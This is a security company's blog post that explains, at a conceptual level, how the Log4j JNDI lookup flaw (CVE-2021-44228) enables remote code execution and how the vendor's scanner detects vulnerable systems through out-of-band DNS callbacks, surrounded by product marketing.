Get a free application, infrastructure and malware scan report - Scan Your Website Now

Log4j Vulnerability – Technical Details

Posted DateApril 12, 2022
Posted Time 3   min Read

In December 2021, log4j aka CVE-2021-44228 was publicly released and rapidly was flagged as one of the most critical security vulnerabilities in recent years. This article will talk about this vulnerability in depth – why it is critical and how Indusface detects and protects against the vulnerability.

Log4j – The Zero-Day Vulnerability

Log4j is a logging library, part of the Apache Software Foundation’s Apache Logging Services project, that is pretty much ubiquitous in applications and services built using Java.

Applications regularly log many pieces of data continuously, often at every request/transaction, for various purposes like telemetry, analytics, enabling post facto diagnosis of issues, etc. With computing and storage becoming ever cheaper, logging has become more verbose over the years. A lot of the data logged comes from user requests which means an attacker can control what is logged. For example, web applications typically log the user-agent to categorize devices used to access the application.

It may seem strange that a vulnerability in a logging library can be this critical even if attackers can control what is logged since logs are generally understood to be simple string data. However, log4J allows lookups that can be used to enhance the log messages. For example, information like environment variables, hardware, and locale can be added to the log message to aid developers in debugging issues. One of the lookups supported was JNDI (Java Naming and Directory Interface) which allows looking up and loading Java objects by name and crucially allowed loading and executing java code from remote servers such as LDAP servers. An attacker could send a crafted string which, when logged, could execute arbitrary code in the context of the process that is writing the log.

Another reason this vulnerability is so insidious is that data flows through many systems, sometimes transformed and other times unchanged for processing as well as for analytics. In all these steps and systems, logs will be generated. This means that even if the system facing the internet is not vulnerable, other internal systems and 3rd party services that are used could also be vulnerable. Finding the attack surface and vulnerable systems is not straightforward.

How Does Indusface Detect This Vulnerability?

Dynamic testing for the vulnerability is not straightforward since logs may be generated and written at any time so the checking must be out of band i.e., a simple ‘send attack, check response’ will not suffice. Indusface uses a specially crafted JNDI attack vector containing a unique subdomain of a domain that we control. If a log using this vector is generated on a vulnerable system, log4j will trigger a DNS lookup of that subdomain and when we detect the DNS lookup, we know that the system is vulnerable. The Indusface WAS scanner will scan all areas of the application request such as header, query parameters, cookies, etc., and will provide all the attack details when the vulnerability triggers pinpointing to the exact page, parameter and attack. Since logs may not be generated immediately on the system, the vulnerability may be reported some time after the scan and not immediately.

In one interesting case, we reported a vulnerable log4j system a week after the probe was sent. Even though the application is scanned daily, we always reported the alert only on a particular day of the week. On further investigation, we narrowed this down to a process that executes weekly to perform tasks like summarizing and auditing and that process was vulnerable to log4j.

Protection and Mitigation

Due to the nature of this vulnerability, successfully exploiting a vulnerable system is complicated but the threat is serious, and attacks are still going on. As can be seen in the chart below, attacks, are being blocked by AppTrana everyday even months after the vulnerability was disclosed.

Log4j attacks

Figure 1: Attacks still occur regularly

The figure below categorizes the areas being targeted for possible Log4j vulnerabilities. Unsurprisingly, HTTP headers dominate since many headers will typically be logged by the application.

log4j attacked area

Figure 2: Split of areas being targeted (Headers dominate)

Indusface AppTrana provides real-time protection and visibility for attacks targeting the log4j vulnerabilities since December 2021. Additionally, Indusface recommends that all customers apply the mitigation steps to guard against this vulnerability.

Stay tuned for more relevant and interesting security articles. Follow Indusface on FacebookTwitter, and LinkedIn.

Best Application Security Service Provider

Karthik Krishnamoorthy

Karthik Krishnamoorthy is a senior software professional with 28 years of experience in leadership and individual contributor roles in software development and security. He is currently the Chief Technology Officer at Indusface, where he is responsible for the company's technology strategy and product development. Previously, as Chief Architect, Karthik built the cutting edge, intelligent, Indusface web application scanning solution. Prior to joining Indusface, Karthik was a Datacenter Software Architect at McAfee (Intel Security), and a Storage Security Software Architect at Intel Corporation, in the endpoint storage security team developing security technology in the Windows kernel mode storage driver. Before that, Karthik was the Director of Deep Security Labs at Trend Micro, where he led the Vulnerability Research team for the Deep Security product line, a Host-Based Intrusion Prevention System (HIPS). Karthik started his career as a Senior Software Developer at various companies in Ottawa, Canada including Cognos, Entrust, Bigwords and Corel He holds a Master of Computer Science degree from Savitribai Phule Pune University and a Bachelor of Computer Science degree from Fergusson College. He also has various certifications like in machine learning from Coursera, AWS, etc. from 2014.

Share Article:

Join 51000+ Security Leaders

Get weekly tips on blocking ransomware, DDoS and bot attacks and Zero-day threats.

We're committed to your privacy. indusface uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.

Related Posts

Log4j vulnerability
How to Tackle the Log4j Vulnerability?

Apache Log4j is an open-source logging package for Java distributed under the Apache Software License. Logging and tracing software, like Log4j, collects and stores activity records on a server.    A.

Read More
Real-Time Protection of Log4j
Real-Time Protection of Log4j with AppTrana – Through its Risk-Based Approach

With the discovery of Log4j vulnerability on December 9th (Also known as Log4shell), the cybersecurity world has gone on a tailspin. It is one of the most potent vulnerabilities identified in recent times.

Read More
Apache Log4j Remote Code Execution Vulnerability
Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

What is Apache Log4j Remote Code Execution (CVE-2021-44228) Vulnerability? Log4j 2 is a logging library used in many Java applications and services. The library is part of the Apache Software.

Read More

AppTrana

Fully Managed SaaS-Based Web Application Security Solution

Get free access to Integrated Application Scanner, Web Application Firewall, DDoS & Bot Mitigation, and CDN for 14 days

Get Started for Free Request a Demo

Gartner

Indusface is the only cloud WAAP (WAF) vendor with 100% customer recommendation for 4 consecutive years.

A Customers’ Choice for 2024, 2023 and 2022 - Gartner® Peer Insights™

The reviews and ratings are in!